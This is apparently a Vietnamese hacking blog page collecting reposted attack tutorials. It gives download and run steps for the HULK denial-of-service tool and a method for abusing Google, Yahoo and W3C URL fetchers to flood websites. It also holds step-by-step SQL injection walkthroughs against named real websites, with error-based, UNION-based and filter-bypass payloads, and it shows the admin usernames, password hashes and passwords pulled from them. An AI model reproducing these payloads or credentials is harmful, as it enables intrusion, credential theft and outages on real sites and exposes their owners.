Halloween party ideas 2015

https://b27ce251cbf73a9cf88690352e6d5fa8c9107d26.googledrive.com/host/0BzPzFQt1URWNfkJUX3VKQUhmT0J3WThlZGdIcUFud3I2Zy02SXJ3M2pHMTh2c3Qza1VIQms/hulk20154.rar link download hulk

Download Python 2.7 tại đây
Python
Dowload Python 2.7 về và cài đặt, xong, download Hulk20154.rar về, giải nén với Pass: hackerhacker; hacker123; hackerhacker123; ko nhớ cái pass nào nữa.... giải nén xog, vào folder mới giải nén. copy file hulk20154.py rùi paste vào folder Python trog ổ C:/ với đường dẫn sau. C:/python27/
ta có được địa chỉ C:/python27/hulk20154.py.
chọn Start, gõ cmd hoặc gõ trong Run -> cmd
xuất hiện cổng Command Port. chạy mã sau trong Command Port.
cd C:/python27
hulk20154.py http://victim.com/
nếu nó chạy --------Attack Started....-------- là đang hoạt động. còn nếu nó ra lỗi thì kiểm tra coi thử gõ sai gì ko....

*Ngoài cách này ta còn có thể copy code của Hulk, dán vào 1 file trên Koding, rùi đánh trực tiếp trên Koding với mã sau:
python hulk20154.py http://victim.com/
Hulk20154.rar

Hướng dẫn tạo Google, Yahoo , WordPress DDoS ( *.txt + plus.html )

Tương tự khi ta post 1 link ảnh lên facebook note ( các bạn tạo 1 fanpages -> note -> public để khi ddos thì sẽ public hết tất cả mọi người — ko cần login )

-> Máy chủ facebook sẻ tự động tải link ảnh đó lên , và sẽ hiển thị lên facebook note của các bạn

Tương tự : với Blogger.com , WordPress.com ,Twitter.com cũng như thế
– Các bạn nên setup 1 vps ở Koding.com để test ( run command : netstat -n |grep :80 )

nên nhớ : khi bạn
ddos vào 1 trang web đó -> thì trang web đó sẽ ko thực thi lệnh trong trang
nên khi bạn dùng LOIC ( html ddos ) vào blogger ( chứa <images > ljnk ảnh </images> ) đến phá băng thông victim thì sẽ ko đc hiện đc

cho nên : chèm code html vào bloger ( hoặc wordpress ) rồi dùng file plus.html để refesh thì sẽ hiệu quả hơn

còn file : kymljnk.html ( đối với ljnk đầu tiênPlus.google.com.…và link cuối cùng rss của yahoo , thì bạn phải đăng nhập với đường ljnk khi add victim vào trước …thì yahoo nó mới tấn công nhé )
=> ko thì bạn ddos thì nó sẽ đứng trình duyệt của bạn

p/s : đây là ddos băng thông nhé , bạn biết website sẽ sập khi băng thông hết … cho nên đừng có bảo vừa bật tool lên ddos 5′ mà web vẫn chạy là sao nhé ! ~> stupid hacker

— hướng dẫn làm F5 ddos ( kymljnk.html )
các bạn tư duy thử nhé :
https://plus.google.com/share?url ~> Google ddos
https://drive.google.com/viewerng/viewer?url -> Google ddos
http://validator.w3.org/feed/check.cgi?url -> W3 ddos
https://add.my.yahoo.com/rss?url -> Yahoo ddos

Link Tải Về : https://drive.google.com/file/d/0BzEN6oFWhqInbWVpbFdsbG9zN1E/view?usp=sharing
sưutam

http://www.ianforsythphotographer.com/main.php?id=1' 


Lỗi
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 


Dùng đoạn lệnh này lấy ver
and extractvalue(rand(),concat(0x0a,version()))--+ 


link :

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+

Có thông tin : "Query failed: XPATH syntax error: ' 5.1.39-log'" ==> ver > 5

get tablename bằng đoạn code sau:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+ 


Link Dạng


http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=0x69665f696d61676573 limit 3,1)))--+ 


Ta có: "Query failed: XPATH syntax error: ':logger_config'"
tablename: plogger_config 


ta khai thác tiếp bằng code sau:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="TABLE NAME" limit 0,1))) 


trong đó table name ta thay bằng plogger_config mà ta đã check đc lúc nãy và ta có link:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 3,1)))--+ 


ta có:

"Query failed: XPATH syntax error: '::admin_username'" 




http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 4,1)))--+ 



"Query failed: XPATH syntax error: '::admin_password'" 


và ta có đoạn lấy pass và username tổng hợp bằng code sau:

extractvalue(rand(),concat(0x0a,(select concat(COLUMNS) from TABLE)))-- 


Trong đó COLUMNS là hai cái column ta khai thác dc là
+ admin_username
+ admin_password 


trong đó columns se có dạng select concat(admin_username,0x3a,admin_password) nhớ là có 0x3a

và TABLE là cái table ta khai thác dc lúc đầu thay vào link có dang:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT 0,1)))--+ 


"Query failed: XPATH syntax error: 'admin:392592ed88f501ea498f14343'" 


haha 392592ed88f501ea498f14343' ==> MD5 còn nữa là chuyện của anh em nhé

SUUTAM


[INDENT] http://namphongcomputer.com/?php=product_detail&id=216' 



http://namphongcomputer.com/?php=product_detail&id=216 order by 15 


-- > Ko lỗi
http://namphongcomputer.com/?php=product_detail&id=216 order by 16 


-- > Lỗi
Như vậy là chứng tỏ điều gì nhỉ :-> Có tất cả 15 trường.

Tìm vị trí trường bị lỗi
Dùng câu lệnh UNION SELECT
http://namphongcomputer.com/?php=product_detail&id=216 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 


Không thấy số đâu cả :-O …. Ak phải thêm dấu – phía trước số 216 đã
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 


iờ thì thấy các trường bị lỗi rồi nhá 3, 6 ,7
Trường hợp không hiện số thì ta view source để xem Hoặc nhiều cách khác

Giờ thì check version hay user database gì đấy thì tùy mình lười nói tới, đoán chắc trang này ver 5 trở lên nên ta đi vào tìm table luôn
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12, 13,14,15 from information_schema.tables where table_schema=database()-- - 


- mình thêm vào phía sau ở đây để tránh log, vì trang này nằm trong tỉnh nên 

Ax mà sao ko thấy table nào thế này ==” Đành phải xài unhe
Angryhex thôi :->
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unheAngryheAngrygroup_concat(table_name))),4,5,6,7,8 ,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- - 


-->
tbl_config,tbl_content,tbl_content_category,tbl_me mber,tbl_order,tbl_order_detail,tbl_product,tbl_pr oduct_category,tbl_product_new,tbl_product_special ,tbl_user,tbl_visitor 


Nhưng ở đây ta chỉ quan tâm thằng tbl_user thôi 

Get column của nó nào :”>

Ý quên, phải chuyển tbl_user sang mã hex đã :”> Vào đây nhé 
http://www.swingnote.com/tools/texttohex.php

tbl_user sang max hex sẽ là 74626c5f75736572 ta thêm 0x vào thành 0x74626c5f75736572. Để đấy tí có việc
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unheAngryheAngrygroup_concat(column_name))),4,5,6,7, 8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- - 


Đấy :-> Đặt phía sau table_name, ta có thể thay mã hex bằng char ( phía sau sách tin học 11 có bảng mã ấy đấy =]]]]] )

Xem trong tbl_user có gì nào :->

id, uid, pwd 


Giờ là công đoạn cuối Xem user và pass của admin 
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unheAngryheAngrygroup_concat(0x20,id,0x7c,uid,0x7c,p wd))),4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user 


0x20 và 0x7c ở đây là dấu cách và dấu | đã sang mã hex :”>

Chúng ta có user và pass admin Pass đang bị mã hóa 

1|admincp|00feb756fdb9ba391496f96e702e6d91,
2|coder|202cb962ac59075b964b07152d234b70 

SƯUTAM

[INDENT] Victim: http://quangcaovinasun.com.vn

Bước 1: Check link lỗi

Đối với site aspx, ta thêm dấu ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi: 

Unclosed quotation mark after the character string ''

Chứng tỏ site dính lỗi SQLI.
Ví dụ: 
http://quangcaovinasun.com.vn/Produc...MaSP=42’ 


[Image: attachment.php?attachmentid=265&d=1334797944]


Bước 2: Truy vấn tên các table


http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- - 


 

Conversion failed when converting the nvarchar value 'tbl_DangNhap' to data type int.

Tiếp tục truy vấn:

http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap')))-- - 


Conversion failed when converting the nvarchar value 'tbl_DiaChi' to data type int.


[Image: attachment.php?attachmentid=264&d=1334797944]

Tiếp tục,

http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap','tbl_DiaChi' )))-- - 


Conversion failed when converting the nvarchar value 'tbl_DoiTac' to data type int.


Làm tương tự cho tới khi xuất hiện table user chứa thông tin username và password. Ở site này table chứa thông admin đăng nhập của admin là table đầu tiên:
Tbl_DangNhap


 


Như thông tin khai thác được ở trên. Table chứa thông tin username và password chính là table: 
tbl_DangNhap. Chính vì vậy ta sẽ khai thác table này.


http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') ))-- - 



Conversion failed when converting the nvarchar value 'ID' to data type int.

[Image: attachment.php?attachmentid=266&d=1334797944]

http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID')))-- - 


Conversion failed when converting the nvarchar value 'TenDN' to data type int.

http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID','TenDN')))-- - 


Conversion failed when converting the nvarchar value 'Matkhau' to data type int.


Bước 4: Khai Thác thông tin username và password


- Thông tin username:

http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 TenDN from tbl_DangNhap))-- - 



 

- Thông tin password 

http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 Matkhau from tbl_DangNhap))--- 


 
- Hoặc get cả username và password

http://quangcaovinasun.com.vn/Produc...l.aspx?MaSP=42 and 1=convert(int,(select top 1 TenDN%2b'/'%2bMatkhau from tbl_DangNhap))-- - 


Conversion failed when converting the nvarchar value 'loimv/maihoanglinh@' to data type int

[Image: attachment.php?attachmentid=263&d=1334797944]


Bước 5: Tìm link admin và đăng nhâp 


Sử dụng tool havij hoặc web admin finder, đã được giới thiệu ở bài 2:

http://ducdung08clc.blogspot.com/201...faultvmlo.html 

Ta được link admin: 

http://quangcaovinasun.com.vn/admin/Default.aspx 


admin: loimv

SƯU TẦM

http://www.mediafire.com/?noyg6ggdgpwl1lv 



hi mọi người, hôm nay e xin làm cái TUT khai thác SQL bypass 403, vì có nhiều bạn khỏi khai thác nó thế nào
trong rum MMD đã có người post trang này ròi nhưng không biết nó thất lạc nơi đâu nên e xin post lại
victim: 
http://www.badalaonline.com/product_detail.php?id=940 


các bạn tải hackbar cho dễ đi câu lệnh

linkdownload: 
https://addons.mozilla.org/vi/firefox/addon/hackbar/ 


đầu tiên là check lổi, thêm ' vào phía sau
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/badalaon/public_html/product_detail.php on line 9 


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/badalaon/public_html/product_detail.php on line 14 


lổi ròi 

tìm cột lổi của nó
http://www.badalaonline.com/product_detail.php?id=940 order by 1-- - 


vẫn bt vậy tăng lên xem
các bạn nhớ là nó chỉ có số 1 đến 100 thoi nha còn nếu như bạn order by 100-- - mà nó vẫn bt thỳ thêm ' vào sau 
product_detail.php?id=940' order by 100-- - như thế đó.
tìm cột lổi của nó

http://www.badalaonline.com/product_detail.php?id=940 order by 25-- - 


lổi vậy cái cột cần tìm nằm từ 20 đến 25
http://www.badalaonline.com/product_detail.php?id=940 order by 23-- - trở tại bt thỳ cột cần tìm là 23
403 nên mình sẽ bypass kiểu 403

http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23-- - 


ra 1 đống số
mình chọn số 2 đi nhá, xem version

http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23-- - 


5.1.56 => dễ khai thác, nếu nó bé hơn 5 thỳ khó lắm pro mới chơi dc 
xem table name của nó
đây là 403 nên câu lệnh sẽ khác 1 chút

http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,table_name),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!tables*/ where table_schema=database()-- - 


nếu câu lệnh bt là:

http://www.badalaonline.com/product_detail.php?id=-940 /*!UNION SELECT*/ 1,group_concat(/*!table_name*/),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23 /*!from information_schema.tables where table_schema=database()*/-- - 


đó như thế, hoặc làm vậy mà k ra nữa thỳ thêm unhe
Angryhex.....))

http://www.badalaonline.com/product_detail.php?id=-940 /*!UNION SELECT*/ 1,unheAngryheAngrygroup_concat(/*!table_name*/))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23 /*!from information_schema.tables where table_schema=database()*/-- - 


đó như thế. nó ra 1 table name là admin
còn nếu đi câu lệnh như thế mà nó k ra table name là admin
ví dụ nó ra table name là order đi, còn mình thì muốn là admin thỳ phải dùng limit

http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,table_name),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!tables*/ where table_schema=database() limit 1,1-- - 


cứ năng số đó từ 0,1 - 0,2 - 0,3....................
như thế đó trong trường hợp này thỳ nó ra admin ròi nên khỏi dùng limit 

http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,column_name),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!columns*/ where table_name=0x61646d696e limit 0,1-- - 


nó ra 1 column name là uname => đây là username á
tăng limit lên mể tìm column password
hehe, pass => password
ok giờ mình sẽ xem nick admin

http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,uname),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23 from admin-- - 


username: admin
password: 645219


SƯU TẦM
Được tạo bởi Blogger.